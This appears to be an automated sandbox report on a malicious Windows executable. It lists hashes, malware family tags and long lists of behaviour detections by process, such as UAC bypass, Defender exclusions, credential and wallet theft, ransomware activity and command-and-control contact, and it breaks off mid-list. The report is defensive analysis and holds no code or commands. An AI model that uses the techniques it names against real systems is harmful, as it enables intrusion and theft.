File name:

main.exe

Full analysis: https://app.any.run/tasks/ad583de2-882f-4f0d-bb90-f7f20a4b9aa6
Verdict: Malicious activity
Threats:

Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security.

Analysis date: April 30, 2026, 13:15:32
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto
xworm
rat
phorpiex
botnet
github
possible-phishing
anti-evasion
stealer
stealc
clickfix
phishing
powershell
python
uac
adaptixc2
generic
smoke
loader
xenorat
action1rmm
violetworm
worm
cryptowall
ransomware
adware
tinynuke
njrat
bladabindi
quasar
smb
remote
cobaltstrike
tool
pyinstaller
meterpreter
koiloader
havoc
discordrat
websocket
guloader
clipbanker
networm
amus
coinminer
miner
metasploit
bruteratel
stealerium
wannacry
redline
remcos
whitesnakestealer
donutloader
emotet
screenconnect
rmm-tool
jigsaw
rustystealer
scan
smbscan
asyncrat
telegram
payload
agenttesla
pythonstealer
pastebin
putty
autoit
amadey
noescape
wiper
cryptolocker
datto
neshta
formbook
dattormm
teamviewer
dharma
muckstealer
lumma
evasion
whitesnake
ghostsocks
proxyware
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 7 sections
MD5:

C942A56638772644D847709D906FA23D

SHA1:

12D6B77FEC2244CDC4050A083AA741185CC48010

SHA256:

56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A

SSDEEP:

98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • XWORM has been found (auto)

      • main.exe (PID: 1904)
      • main.exe (PID: 2456)
    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 3276)
    • Changes settings of System certificates

      • support.client.exe (PID: 2648)
      • msiexec.exe (PID: 23232)
      • VOKLIGHTD.exe (PID: 25668)
      • EdmsLauncher.exe (PID: 22800)
      • powershell.exe (PID: 14120)
      • CFXBypass.exe (PID: 7780)
    • TINYNUKE has been found (auto)

      • main.exe (PID: 2456)
    • SMOKE has been found (auto)

      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
    • QUASAR has been found (auto)

      • main.exe (PID: 2456)
    • GENERIC has been found (auto)

      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • UniversalBrowser.exe (PID: 7800)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • Axam.a.exe (PID: 2828)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • assignment.exe (PID: 12576)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • Amus.exe (PID: 14728)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
    • Gets TEMP folder path (SCRIPT)

      • wscript.exe (PID: 5648)
      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 11100)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 5648)
      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 11100)
    • Changes powershell execution policy (Bypass)

      • main.exe (PID: 2456)
      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 5648)
      • svchost.exe (PID: 13292)
      • powershell.exe (PID: 11556)
    • Reads a specific registry key of the VM

      • stub.exe (PID: 3536)
    • PHORPIEX has been detected

      • main.exe (PID: 2456)
    • Create files in the Startup directory

      • UniversalBrowser.exe (PID: 7800)
      • he.exe (PID: 5564)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • Guel+7KJvOKF.exe (PID: 11592)
      • explorer.exe (PID: 12440)
      • Axam.a.exe (PID: 2828)
      • InfinityCrypt.exe (PID: 20676)
      • n743.exe (PID: 7352)
      • Fast%20Download.exe (PID: 17644)
      • CoronaVirus.exe (PID: 25648)
    • PHORPIEX has been detected (SURICATA)

      • main.exe (PID: 2456)
    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2232)
    • VIOLETWORM has been found (auto)

      • main.exe (PID: 2456)
      • he.exe (PID: 5564)
    • Changes the autorun value in the registry

      • UniversalBrowser.exe (PID: 7800)
      • he.exe (PID: 5564)
      • Guel+7KJvOKF.exe (PID: 11592)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • explorer.exe (PID: 12440)
      • reg.exe (PID: 12728)
      • Axam.a.exe (PID: 2828)
      • hell9o.exe (PID: 14452)
      • rxd_en_1.exe (PID: 14476)
      • rmd_en_1.exe (PID: 14076)
      • Serials_Checker.exe (PID: 20940)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 19316)
      • rod_en_1.exe (PID: 16900)
      • Serials_Checker.exe (PID: 22132)
      • WannaCry.exe (PID: 21048)
      • Jigsaw.exe (PID: 16616)
      • n743.exe (PID: 7352)
      • dxwebsetup.exe (PID: 22772)
      • FreeYoutubeDownloader.exe (PID: 23208)
      • Client.exe (PID: 25960)
      • Amus.exe (PID: 14728)
      • CoronaVirus.exe (PID: 25648)
      • Axam.exe (PID: 16464)
      • FXServer.exe (PID: 16136)
      • Axam.exe (PID: 27044)
    • ACTION1RMM has been found (auto)

      • main.exe (PID: 2456)
    • Copies file to a new location (SCRIPT)

      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 5648)
    • HAVOC has been found (auto)

      • main.exe (PID: 2456)
    • CLICKFIX has been detected (SURICATA)

      • main.exe (PID: 2456)
    • Bypass User Account Control (Modify registry)

      • file_c8e4af3ea647650f.exe (PID: 4776)
    • COBALTSTRIKE has been found (auto)

      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
    • KOILOADER has been found (auto)

      • main.exe (PID: 2456)
    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 11100)
    • METERPRETER has been found (auto)

      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
    • ADAPTIXC2 has been detected (SURICATA)

      • agent.x64.exe (PID: 7868)
    • NJRAT has been found (auto)

      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
    • XenoRAT has been detected (FILE)

      • Client.exe (PID: 11820)
      • Client.exe (PID: 16784)
    • DISCORDRAT has been found (auto)

      • main.exe (PID: 2456)
    • COINMINER has been found (auto)

      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
    • Bypass User Account Control (fodhelper)

      • fodhelper.exe (PID: 11872)
    • CRYPTOWALL has been detected

      • explorer.exe (PID: 12440)
      • explorer.exe (PID: 12440)
      • Taskmgr.exe (PID: 7712)
      • cfxre.exe (PID: 15064)
      • CoronaVirus.exe (PID: 25648)
    • Masquerads svchost executed from Users Public

      • svchost.exe (PID: 13292)
    • BRUTERATEL has been found (auto)

      • main.exe (PID: 2456)
    • NJRAT mutex has been found

      • n743.exe (PID: 7352)
      • Fast%20Download.exe (PID: 17644)
      • Fast%20Download.exe (PID: 15024)
    • WHITESNAKESTEALER has been found (auto)

      • main.exe (PID: 2456)
    • RUSTYSTEALER has been found (auto)

      • main.exe (PID: 2456)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 14408)
    • SCREENCONNECT has been detected

      • dfsvc.exe (PID: 4704)
      • main.exe (PID: 2456)
    • Executing a file with an untrusted certificate

      • brbotnet.exe (PID: 16252)
      • PrivacyPolicy.exe (PID: 25548)
      • Solara.exe (PID: 12232)
      • ClientRun.exe (PID: 27280)
      • lol.exe (PID: 7212)
      • steamcmd.exe (PID: 12980)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 27664)
      • lol1.exe (PID: 27740)
      • ChatLife.exe (PID: 24120)
      • LukeJazz.exe (PID: 15228)
      • compiled.exe (PID: 13104)
    • STEALC has been found (auto)

      • main.exe (PID: 2456)
    • AGENTTESLA has been found (auto)

      • main.exe (PID: 2456)
    • STEALER has been found (auto)

      • main.exe (PID: 2456)
    • NETWORM mutex has been found

      • Amus.exe (PID: 14728)
    • XWORM has been detected (SURICATA)

      • he.exe (PID: 5564)
      • Violet.exe (PID: 11672)
      • hey.exe (PID: 8244)
    • Application was injected by another process

      • sihost.exe (PID: 4412)
      • RuntimeBroker.exe (PID: 5232)
      • RuntimeBroker.exe (PID: 5728)
      • explorer.exe (PID: 4696)
      • RuntimeBroker.exe (PID: 6548)
      • ctfmon.exe (PID: 6908)
      • RuntimeBroker.exe (PID: 7308)
      • conhost.exe (PID: 760)
      • conhost.exe (PID: 4244)
      • conhost.exe (PID: 7396)
      • conhost.exe (PID: 7716)
      • conhost.exe (PID: 2824)
    • Runs injected code in another process

      • 2.exe (PID: 14436)
    • REMCOS has been found (auto)

      • main.exe (PID: 2456)
      • FXServer.exe (PID: 23216)
      • main.exe (PID: 2456)
      • FXServer.exe (PID: 16136)
    • ASYNCRAT has been found (auto)

      • main.exe (PID: 2456)
      • main.exe (PID: 2456)
    • STEALC has been detected

      • build1.exe (PID: 21008)
    • DATTORMM has been found (auto)

      • main.exe (PID: 2456)
    • Checks whether a specified folder exists (SCRIPT)

      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 5648)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 5648)
      • wscript.exe (PID: 7592)
    • GHOSTSOCKS has been found (auto)

      • main.exe (PID: 2456)
    • REMCOS has been detected

      • prueba.exe (PID: 22112)
    • REMCOS mutex has been found

      • prueba.exe (PID: 22112)
      • prueba.exe (PID: 23320)
      • FXServer.exe (PID: 16136)
    • WANNACRY mutex has been found

      • WannaCry.exe (PID: 21048)
    • MUCKSTEALER has been found (auto)

      • main.exe (PID: 2456)
    • Actions looks like stealing of personal data

      • bypass.exe (PID: 20652)
      • bnkrigkawd.exe (PID: 15452)
    • EMOTET mutex has been found

      • 640.exe (PID: 23224)
      • 640.exe (PID: 17200)
      • paramssps.exe (PID: 11192)
      • paramssps.exe (PID: 2680)
    • JIGSAW has been detected

      • Jigsaw.exe (PID: 16616)
      • Jigsaw.exe (PID: 16616)
    • Uses Task Scheduler to run other applications

      • n743.exe (PID: 7352)
      • Client.exe (PID: 16784)
    • Changes Windows Defender settings

      • Vikings.exe (PID: 13384)
      • explorer.exe (PID: 4696)
      • powershell.exe (PID: 14672)
    • Adds path to the Windows Defender exclusion list

      • Vikings.exe (PID: 13384)
      • explorer.exe (PID: 4696)
    • Creates scheduled task from XML file

      • Client.exe (PID: 16784)
    • AMADEY mutex has been found

      • pfntjejghjsdkr.exe (PID: 23660)
    • SANTASTEALER has been found (auto)

      • main.exe (PID: 2456)
    • Attempting to scan the network

      • Meredrop.exe (PID: 12820)
    • NOESCAPE has been detected

      • NoEscape.exe (PID: 26132)
    • DEERSTEALER has been found (auto)

      • main.exe (PID: 2456)
    • NESHTA mutex has been found

      • cfxre.exe (PID: 15064)
      • FXServer.exe (PID: 23216)
    • DESTINYSTEALER has been found (auto)

      • main.exe (PID: 2456)
    • FORMBOOK has been detected

      • msdt.exe (PID: 26432)
    • RANSOMWARE has been detected

      • CoronaVirus.exe (PID: 25648)
    • DHARMA mutex has been found

      • CoronaVirus.exe (PID: 25648)
    • Renames files like ransomware

      • CoronaVirus.exe (PID: 25648)
    • Steals credentials from Web Browsers

      • bnkrigkawd.exe (PID: 15452)
    • SMBSCAN has been detected (SURICATA)

      • Meredrop.exe (PID: 12820)
    • QUASAR mutex has been found

      • Client-built.exe (PID: 22148)
    • WhiteSnake has been detected

      • bnkrigkawd.exe (PID: 15452)
    • MINER has been detected (SURICATA)

      • xblkpfZ8Y4.exe (PID: 23264)
    • Stealers network behavior

      • svchost.exe (PID: 2232)
  • SUSPICIOUS

    • Process drops python dynamic module

      • main.exe (PID: 1904)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 21608)
      • mvc3.exe (PID: 24524)
      • ksv.exe (PID: 13836)
    • Executable content was dropped or overwritten

      • main.exe (PID: 1904)
      • main.exe (PID: 2456)
      • file_c8e4af3ea647650f.exe (PID: 4776)
      • s287.exe (PID: 11092)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • he.exe (PID: 5564)
      • Client.exe (PID: 11820)
      • explorer.exe (PID: 12440)
      • Qbix01.exe (PID: 11788)
      • Axam.a.exe (PID: 2828)
      • Prolin.exe (PID: 13960)
      • 2.exe (PID: 14436)
      • rxd_en_1.exe (PID: 14476)
      • standalone_payload.exe (PID: 13940)
      • CryptoLocker.exe (PID: 15536)
      • Bexitor%20Installer.exe (PID: 14812)
      • assignment.exe (PID: 12576)
      • rmd_en_1.exe (PID: 14076)
      • haeum.exe (PID: 16040)
      • setup.exe (PID: 18764)
      • EDMSLauncherSetup.exe (PID: 14980)
      • 444.exe (PID: 15056)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 14688)
      • pardufrigi_installer_1.0.p1.exe (PID: 20660)
      • RMO_SE~2.EXE (PID: 16352)
      • is-F7NCO.tmp (PID: 21452)
      • pardufrigi_installer_1.0.p1.tmp (PID: 21884)
      • WannaCry.exe (PID: 21048)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 21608)
      • is-HVP5B.tmp (PID: 21876)
      • FXServer.exe (PID: 23216)
      • dxwebsetup.exe (PID: 22772)
      • n743.exe (PID: 7352)
      • dxwsetup.exe (PID: 12752)
      • Jigsaw.exe (PID: 16616)
      • FreeYoutubeDownloader.exe (PID: 23208)
      • svchost.exe (PID: 13292)
      • ExtremeInjector.exe (PID: 23300)
      • calendar.exe (PID: 20644)
      • ljgksdtihd.exe (PID: 22088)
      • mvc3.exe (PID: 24524)
      • ksv.exe (PID: 13836)
      • PrivacyPolicy.exe (PID: 25548)
      • Client.exe (PID: 25960)
      • 640.exe (PID: 17200)
      • Pinaview.exe (PID: 25684)
      • black.exe (PID: 25624)
      • Security.exe (PID: 25716)
      • cfxre.exe (PID: 15064)
      • Amus.exe (PID: 14728)
      • Rsvp_invite%23903388.exe (PID: 25676)
      • 5252.exe (PID: 22348)
      • gertgherthre.exe (PID: 7304)
      • CritScript.exe (PID: 15276)
      • Agentnov.exe (PID: 12156)
      • PrivacyPolicy.tmp (PID: 12624)
      • ExtremeInjector.exe (PID: 23696)
      • CoronaVirus.exe (PID: 25648)
      • fastping_silent_v4.exe (PID: 11640)
      • snd16061.exe (PID: 12744)
      • FXServer.exe (PID: 16136)
      • NAMUVPN32.exe (PID: 11180)
      • cheet.exe (PID: 25584)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 27664)
    • The process drops C-runtime libraries

      • main.exe (PID: 1904)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 21608)
      • ksv.exe (PID: 13836)
      • mvc3.exe (PID: 24524)
    • Application launched itself

      • main.exe (PID: 1904)
      • AAozznaq.exe (PID: 14340)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 19316)
      • 640.exe (PID: 23224)
      • powershell.exe (PID: 11556)
      • paramssps.exe (PID: 2680)
      • cvf.exe (PID: 22820)
      • mvc3.exe (PID: 24524)
      • 1488.exe (PID: 17516)
      • powershell.exe (PID: 14672)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3276)
      • cmd.exe (PID: 2392)
      • cmd.exe (PID: 11684)
      • cmd.exe (PID: 11796)
      • cmd.exe (PID: 11884)
      • cmd.exe (PID: 11932)
      • cmd.exe (PID: 13520)
      • cmd.exe (PID: 14112)
      • cmd.exe (PID: 14152)
      • cmd.exe (PID: 14172)
      • cmd.exe (PID: 14204)
      • cmd.exe (PID: 14244)
      • cmd.exe (PID: 14180)
      • cmd.exe (PID: 14528)
      • cmd.exe (PID: 14696)
      • cmd.exe (PID: 14868)
      • cmd.exe (PID: 15428)
      • cmd.exe (PID: 17128)
      • cmd.exe (PID: 17804)
      • cmd.exe (PID: 18656)
      • cmd.exe (PID: 18772)
      • cmd.exe (PID: 20620)
      • cmd.exe (PID: 15496)
      • cmd.exe (PID: 20868)
      • cmd.exe (PID: 20888)
      • cmd.exe (PID: 21132)
      • cmd.exe (PID: 21412)
      • cmd.exe (PID: 19700)
      • cmd.exe (PID: 19448)
      • cmd.exe (PID: 22360)
      • cmd.exe (PID: 22516)
      • cmd.exe (PID: 11948)
      • cmd.exe (PID: 18360)
      • cmd.exe (PID: 22672)
      • cmd.exe (PID: 23188)
      • cmd.exe (PID: 23684)
      • cmd.exe (PID: 18456)
      • cmd.exe (PID: 26348)
      • cmd.exe (PID: 26884)
      • cmd.exe (PID: 20924)
      • cmd.exe (PID: 18392)
      • cmd.exe (PID: 28888)
      • cmd.exe (PID: 28904)
      • cmd.exe (PID: 17460)
      • cmd.exe (PID: 26544)
      • cmd.exe (PID: 17668)
    • Loads Python modules

      • main.exe (PID: 2456)
      • mvc3.exe (PID: 28864)
    • Creates scheduled task with highest privileges

      • cmd.exe (PID: 3276)
      • schtasks.exe (PID: 6988)
    • Creates scheduled task with ONLOGON parameter

      • main.exe (PID: 2456)
      • cmd.exe (PID: 3276)
    • The process checks if it is being run in the virtual environment

      • main.exe (PID: 2456)
      • pieletJF_vm.exe (PID: 11664)
      • pieletJF.exe (PID: 12332)
    • Adds/modifies Windows certificates

      • support.client.exe (PID: 2648)
      • msiexec.exe (PID: 23232)
      • VOKLIGHTD.exe (PID: 25668)
      • EdmsLauncher.exe (PID: 22800)
      • powershell.exe (PID: 14120)
      • CFXBypass.exe (PID: 7780)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • mshta.exe (PID: 2576)
      • mshta.exe (PID: 7804)
      • mshta.exe (PID: 2876)
      • mshta.exe (PID: 6556)
      • mshta.exe (PID: 8264)
      • mshta.exe (PID: 14004)
      • mshta.exe (PID: 14060)
      • mshta.exe (PID: 14068)
      • mshta.exe (PID: 14104)
      • mshta.exe (PID: 14220)
      • mshta.exe (PID: 14552)
      • mshta.exe (PID: 15496)
      • mshta.exe (PID: 17084)
      • mshta.exe (PID: 17092)
      • mshta.exe (PID: 20596)
      • mshta.exe (PID: 22240)
      • mshta.exe (PID: 23312)
      • mshta.exe (PID: 22544)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 5648)
      • wscript.exe (PID: 7592)
    • Read disk information to detect sandboxing environments

      • stub.exe (PID: 3536)
    • Starts POWERSHELL.EXE for commands execution

      • main.exe (PID: 2456)
      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 5648)
      • wscript.exe (PID: 11100)
      • svchost.exe (PID: 13292)
      • cmd.exe (PID: 11796)
      • cmd.exe (PID: 14152)
      • cmd.exe (PID: 14172)
      • Vikings.exe (PID: 13384)
      • powershell.exe (PID: 11556)
      • ljgksdtihd.exe (PID: 22088)
      • explorer.exe (PID: 4696)
      • powershell.exe (PID: 14672)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 5648)
      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 11100)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7356)
      • powershell.exe (PID: 11448)
      • powershell.exe (PID: 11556)
      • powershell.exe (PID: 11568)
      • powershell.exe (PID: 11656)
      • powershell.exe (PID: 11696)
      • powershell.exe (PID: 11736)
      • powershell.exe (PID: 11780)
      • powershell.exe (PID: 11828)
      • powershell.exe (PID: 11876)
      • powershell.exe (PID: 11912)
      • powershell.exe (PID: 12088)
      • powershell.exe (PID: 14020)
      • powershell.exe (PID: 13988)
      • powershell.exe (PID: 14044)
      • powershell.exe (PID: 14120)
      • powershell.exe (PID: 14144)
      • powershell.exe (PID: 13952)
      • powershell.exe (PID: 14136)
      • powershell.exe (PID: 14188)
      • powershell.exe (PID: 14212)
      • powershell.exe (PID: 14228)
      • powershell.exe (PID: 14408)
      • powershell.exe (PID: 14672)
      • powershell.exe (PID: 15336)
      • powershell.exe (PID: 14828)
      • powershell.exe (PID: 14852)
      • powershell.exe (PID: 14836)
      • powershell.exe (PID: 14876)
      • powershell.exe (PID: 15460)
      • powershell.exe (PID: 16200)
      • powershell.exe (PID: 23016)
      • powershell.exe (PID: 23284)
      • powershell.exe (PID: 23292)
      • powershell.exe (PID: 23336)
      • powershell.exe (PID: 5284)
      • powershell.exe (PID: 2088)
      • powershell.exe (PID: 21604)
      • powershell.exe (PID: 23976)
      • powershell.exe (PID: 26324)
      • powershell.exe (PID: 21008)
    • The process creates files with name similar to system file names

      • UniversalBrowser.exe (PID: 7800)
      • file_c8e4af3ea647650f.exe (PID: 4776)
      • he.exe (PID: 5564)
      • main.exe (PID: 2456)
      • 444.exe (PID: 15056)
      • Rsvp_invite%23903388.exe (PID: 25676)
      • CoronaVirus.exe (PID: 25648)
    • Possible Social Engineering Attempted

      • svchost.exe (PID: 2232)
    • Usage of PowerShell observed

      • main.exe (PID: 2456)
    • Delegate execute modification

      • file_c8e4af3ea647650f.exe (PID: 4776)
    • Starts itself from another location

      • s287.exe (PID: 11092)
      • ybaCy8KVcyR0.exe (PID: 11364)
      • Client.exe (PID: 11820)
      • CryptoLocker.exe (PID: 15536)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 11100)
    • Obfuscation pattern (POWERSHELL)

      • powershell.exe (PID: 11556)
      • powershell.exe (PID: 11568)
      • powershell.exe (PID: 28432)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 5648)
    • Accesses current user name via WMI (SCRIPT)

      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 5648)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7592)
      • wscript.exe (PID: 5648)
    • Executing commands from a ".bat" file

      • main.exe (PID: 2456)
      • Bugsoft.exe (PID: 11648)
      • 7B94.tmp (PID: 20556)
      • Serials_Checker.exe (PID: 20940)
      • Serials_Checker.exe (PID: 22132)
      • sanghyun.exe (PID: 20628)
      • sanghyun-guest.exe (PID: 20992)
      • WannaCry.exe (PID: 21048)
      • G7_Update.exe (PID: 17120)
    • Uncommon PowerShell Invoke command executed

      • powershell.exe (PID: 11912)
      • powershell.exe (PID: 14836)
      • powershell.exe (PID: 5284)
      • powershell.exe (PID: 2088)
      • powershell.exe (PID: 21604)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 1108)
    • Drops 7-zip archiver for unpacking

      • main.exe (PID: 2456)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 27664)
    • Using the short paths format

      • Bugsoft.exe (PID: 11648)
      • main.exe (PID: 2456)
      • cmd.exe (PID: 11932)
      • rxd_en_1.exe (PID: 14476)
      • REXCEL~1.EXE (PID: 18076)
      • Taskmgr.exe (PID: 7712)
      • rod_en_1.exe (PID: 16900)
      • RMO_SE~2.EXE (PID: 16352)
      • explorer.exe (PID: 4696)
      • cfxre.exe (PID: 15064)
    • Reads the date of Windows installation

      • file_c8e4af3ea647650f.exe (PID: 4776)
      • 2.exe (PID: 14436)
      • up.exe (PID: 27180)
    • Uses REG/REGEDIT.EXE to modify or delete registry entries

      • cmd.exe (PID: 11684)
      • cmd.exe (PID: 15428)
    • Likely accesses (executes) a file from the Public directory

      • svchost.exe (PID: 13292)
    • The process executes files with name similar to system file names

      • fodhelper.exe (PID: 11872)
      • main.exe (PID: 2456)
      • cmd.exe (PID: 22516)
      • crypted.exe (PID: 21616)
      • RambledMime.exe (PID: 3756)
      • RedLineStealer.exe (PID: 25500)
      • cmd.exe (PID: 11948)
      • crypted_c360a5b7.exe (PID: 27684)
    • Access to an unwanted program domain was detected

      • main.exe (PID: 2456)
    • Creates file in the systems drive root

      • Axam.a.exe (PID: 2828)
      • Prolin.exe (PID: 13960)
      • explorer.exe (PID: 4696)
      • cfxre.exe (PID: 15064)
      • Amus.exe (PID: 14728)
      • 5252.exe (PID: 22348)
      • CoronaVirus.exe (PID: 25648)
      • Axam.exe (PID: 16464)
      • Axam.exe (PID: 27044)
    • Starts a Microsoft application from unusual location

      • rmd_en_1.exe (PID: 14076)
      • rxd_en_1.exe (PID: 14476)
      • hell9o.exe (PID: 14452)
      • rod_en_1.exe (PID: 16900)
      • Serials_Checker.exe (PID: 20940)
      • Serials_Checker.exe (PID: 22132)
      • cleanup_tool.exe (PID: 22140)
      • WannaCry.exe (PID: 21048)
      • dxwebsetup.exe (PID: 22772)
      • dxwsetup.exe (PID: 12752)
      • NAMUVPN7.exe (PID: 6668)
      • namuvpnx2.exe (PID: 25632)
      • Client.exe (PID: 25960)
      • 4J8576A0E8V3.exe (PID: 23676)
      • bsg.exe (PID: 27708)
      • 4J8576A0E8V3.exe (PID: 28308)
    • Executing commands from ".cmd" file

      • main.exe (PID: 2456)
      • hell9o.exe (PID: 14452)
    • The process verifies whether the antivirus software is installed

      • cmd.exe (PID: 11932)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 11796)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 11796)
    • Starts NET.EXE to display or manage information about active sessions

      • cmd.exe (PID: 11884)
      • net.exe (PID: 16416)
    • Using short paths in the command line

      • rxd_en_1.exe (PID: 14476)
      • rod_en_1.exe (PID: 16900)
      • RMO_SE~2.EXE (PID: 16352)
    • Executes application which crashes

      • AAozznaq.exe (PID: 18200)
      • cmd.exe (PID: 13520)
      • cmd.exe (PID: 11932)
      • cmd.exe (PID: 17804)
      • justpoc.exe (PID: 20684)
      • ZinTask.exe (PID: 15400)
      • Solara.exe (PID: 12232)
      • BootstrapperNew.exe (PID: 17148)
    • Contacting a server suspected of hosting an CnC

      • he.exe (PID: 5564)
      • Violet.exe (PID: 11672)
      • hey.exe (PID: 8244)
      • xblkpfZ8Y4.exe (PID: 23264)
    • Starts application with an unusual extension

      • haeum.exe (PID: 16040)
      • cmd.exe (PID: 17128)
      • cmd.exe (PID: 14180)
      • cmd.exe (PID: 14696)
      • cmd.exe (PID: 18656)
      • cmd.exe (PID: 14868)
      • cmd.exe (PID: 23684)
      • 5252.exe (PID: 22348)
      • Jigsaw.exe (PID: 16616)
      • cmd.exe (PID: 23188)
    • Execution of CURL command

      • Loader.exe (PID: 13388)
      • Loader.exe (PID: 15072)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 15496)
    • Hides command output

      • cmd.exe (PID: 20888)
      • cmd.exe (PID: 21132)
      • cmd.exe (PID: 28888)
      • cmd.exe (PID: 28904)
      • cmd.exe (PID: 17668)
    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 4704)
    • Possible stealing from crypto wallets

      • bypass.exe (PID: 20652)
      • bnkrigkawd.exe (PID: 15452)
    • Reads the Windows owner or organization settings

      • pardufrigi_installer_1.0.p1.tmp (PID: 21884)
      • PrivacyPolicy.tmp (PID: 12624)
      • Pinaview.tmp (PID: 28060)
    • Possible stealing of VPN data

      • bypass.exe (PID: 20652)
      • bnkrigkawd.exe (PID: 15452)
    • Loads DLL from Mozilla Firefox

      • bypass.exe (PID: 20652)
    • Possible stealing of messenger data

      • bypass.exe (PID: 20652)
      • bnkrigkawd.exe (PID: 15452)
    • Possible stealing of FTP data

      • bypass.exe (PID: 20652)
    • Possible stealing of email data

      • bypass.exe (PID: 20652)
      • bnkrigkawd.exe (PID: 15452)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 20620)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 11556)
      • powershell.exe (PID: 11568)
      • powershell.exe (PID: 14212)
      • powershell.exe (PID: 14228)
      • powershell.exe (PID: 11828)
      • powershell.exe (PID: 7356)
      • powershell.exe (PID: 14120)
      • powershell.exe (PID: 14672)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 11556)
      • powershell.exe (PID: 11568)
    • Adds exclusion path to Windows Defender (POWERSHELL)

      • Vikings.exe (PID: 13384)
      • explorer.exe (PID: 4696)
    • PUTTY has been detected

      • putty.exe (PID: 23988)
    • Starts the AutoIt3 executable file

      • main.exe (PID: 2456)
    • Drops a system driver (possible attempt to evade defenses)

      • svchost.exe (PID: 13292)
    • Creates new registry property (POWERSHELL)

      • powershell.exe (PID: 25556)
    • Payload loading activity detected

      • 2.exe (PID: 14436)
    • Reads the BIOS version

      • 52.exe (PID: 25732)
      • Isass.exe (PID: 25708)
    • Executes as Windows Service

      • paramssps.exe (PID: 2680)
    • Uses NETSH.EXE to obtain data on the network

      • cssgo.exe (PID: 14720)
    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 28432)
    • ASCII char obfuscation (POWERSHELL)

